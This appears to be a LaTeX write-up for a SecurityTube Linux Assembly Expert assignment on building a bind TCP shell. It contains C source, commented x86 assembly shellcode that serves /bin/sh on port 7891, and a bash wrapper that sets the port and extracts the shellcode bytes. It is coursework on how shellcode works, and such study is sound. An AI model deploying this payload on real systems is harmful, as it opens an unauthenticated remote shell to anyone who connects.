\documentclass{article} 
\title{Bind TCP shell}
\author{Marco Nappi} 
\usepackage{listings}
\usepackage{geometry}
\geometry{
	a4paper,
	total={170mm,257mm},
	left=20mm,
	top=20mm,
}
\usepackage{hyperref}
\hypersetup{
	colorlinks=true,
	linkcolor=blue,
	filecolor=magenta,
	urlcolor=blue,
}
\begin{document}
\maketitle
\section*{SLAE Assignament 1}
This is the first SLAE Assignment that require to crate a Bind TCP shell shellcode with an wrapper to choose the TCP port to bind.
\section*{The starting point}
To create a BIND shell in Asm x86 i started from a simple one written in C:
\begin{lstlisting}[language=C]
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdlib.h>

int main(){

int host_socket = socket(AF_INET, SOCK_STREAM, 0);

struct sockaddr_in host_address;

host_address.sin_family = AF_INET;
host_address.sin_port = htons(8080);
host_address.sin_addr.s_addr = INADDR_ANY;	

bind(host_socket, (struct sockaddr *)&host_address, sizeof(host_address));

listen(host_socket, 0);

int client_socket = accept(host_socket, NULL, NULL);

dup2(client_socket, 0);
dup2(client_socket, 1);
dup2(client_socket, 2);

execve("/bin/sh", NULL, NULL);
}
\end{lstlisting}

\section*{C code analysis}
From the C code we can individuate the following syscall:\\
$\bullet$ socket \\
$\bullet$ bind \\
$\bullet$ listen \\
$\bullet$ accept \\
$\bullet$ dup2 (that is called 3 times)\\
$\bullet$ execve\\\\		
Using the man command we can find which params each syscall needs from his synopsis:\\
$\bullet$ int socket(int domain, int type, int protocol);\\
$\bullet$ int bind(int sockfd, const struct sockaddr *addr,socklen\_t addrlen);\\
$\bullet$ int listen(int sockfd, int backlog);\\
$\bullet$ int accept4(int sockfd, struct sockaddr *addr,
socklen\_t *addrlen, int flags); \\
$\bullet$ int dup2(int oldfd, int newfd);\\
$\bullet$ int execve(const char *filename, char *const argv[],
char *const envp[]);\\\\
The last question before starting to write the asm code is :\\
How to call a syscall using asm in Linux 86 ?\\
To call a syscall we have to work with the register like so:\\\\	
$\bullet$ In EAX we put the number of the syscall\\
$\bullet$ In EBX we put the first argument of the syscall\\
$\bullet$ In ECX we put the second argument of the syscall\\
$\bullet$ In EDX we put the third argument of the syscall\\
$\bullet$ In ESI we put the fourth argument of the syscall\\
$\bullet$ In EDI we put the fifth argument of the syscall\\

\section*{The asm code}
\begin{lstlisting}[language={[x86masm]Assembler}]
global _start
section .txt
_start:
;zeroing
xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
;create the socket
mov ax,359 ;setting as syscall the socket one
mov bl,0x02 ; passing 02 as the domain that stands for AF_INET
mov cl,0x01 ; passing 01 as the type that stands for SOCK_STREAM
;NB:the third parameter should be passed via edx 
;that now is equal to 0
;we need it like it is to specify we set a TCP socket 
int 0x80 ; call the soft interrupt to let the syscall run
;bind the socket
;creating the struct 2nd arguments for bind
push edx 
push edx ; pushing the address on which the port will bind that's 0.0.0.0
push word 0xd31e ; specifying the port 7891 in reverse
push word 0x02 ; specifying the family : AF_INET
;call bind
mov esi,eax ; storing the socket fd in esi
mov ebx,esi ; passing the socket fd as parameter to the bind syscall
mov ax,361 ; setting the bind syscall
mov ecx,esp ; moving the pointer to the structer as 2nd param
mov dl,0x16 ; setting the length of the address in the third param
int 0x80 ; calling the soft interrupt to run the syscall
;listen
mov ax,363 ; setting the listen syscall
;(the next instruction can be avoided to reduce the shellcode length)
mov ebx,esi ; passing the socket fd as first param 
xor ecx,ecx ; setting the backlog to 0
int 0x80 ; calling the soft interrupt to run the syscall
;accept
mov ax,364 ; setting the accept4 syscall
mov ebx,esi ; setting socket fd as second
xor ecx,ecx ; setting to NULL the socket address because is not used
xor edx,edx ; setting to NULL the address's length
xor esi,esi ; passing 0 the have the same behavior of accept
int 0x80 ; calling the soft interrupt to run the syscall
;dup2 preparation

mov edi,eax
;dup2 times 3
mov cl,0x03 ;setting the counter 
;using cx we define the iterator and all the 3 fd
dup2:
xor eax,eax	;zoring the register to be sure to call the right syscall
mov al,63 ; setting the dup2 syscall
mov ebx,edi ; setting the socket fd 
dec ecx ; decreasing the counter
int 0x80 ; calling the soft interrupt to run the syscall
jnz dup2 ; if the zero flag is 0 jumps to the label dup2
;execve /bin//sh
xor eax,eax ; setting to NULL eax
push eax ; using eax as NULL terminator
push 0x68732f2f  
push 0x6e69622f ; setting the command to run /bin//sh (in reverse)
mov ebx,esp ; setting the pointer to /bin//sh
push eax ; using eax as NULL 
mov edx,esp ; setting the pointer to envp as null
push ebx; using eax as NULL 
mov ecx,esp ; setting the pointer to argv as null
mov eax, 0x0B; setting the execve syscall
int 0x80; soft interrupt to run the syscall
\end{lstlisting}
\section*{The wrapper}
For this assignment a wrapper to choose on which port bind the shell is required.The following wrapper is written in bash
\begin{lstlisting}[language=bash]
x=$( printf "%x" $1 ) ;
echo $x;
echo ${x:2:4}${x:0:2};
sed s/0xport/0x$x/g slae.asm -i ;
nasm -f elf32 -o slae.o;
ld slae.o -o slae;
objdump -d ./slae|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|
cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|
paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';
\end{lstlisting}
\section*{Gitlab Repository}
Here it is the link to my SLAE repository:\\
\url{https://gitlab.com/mrcnpp/SLAE/-/tree/master/SLAE32}
\section*{References}
A good alternative to the man Cmd is this site:\\
\url{https://man7.org/linux/man-pages/man2}
The C code come from this guy repository:\\
\url{https://gist.github.com/them4n/0752ea1cb4267652de3d8152d87b24de\#file-bind-shell-c}\\
Thanks to all guys of the "Assemblers County" who helped me 
\section*{SLAE Statement}
This blog post has been	created	for	completing the requirements of the	SecurityTube Linux Assembly	Expert certification:\\
\url{http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert}\\
Student ID: SLAE-1545
  
\end{document}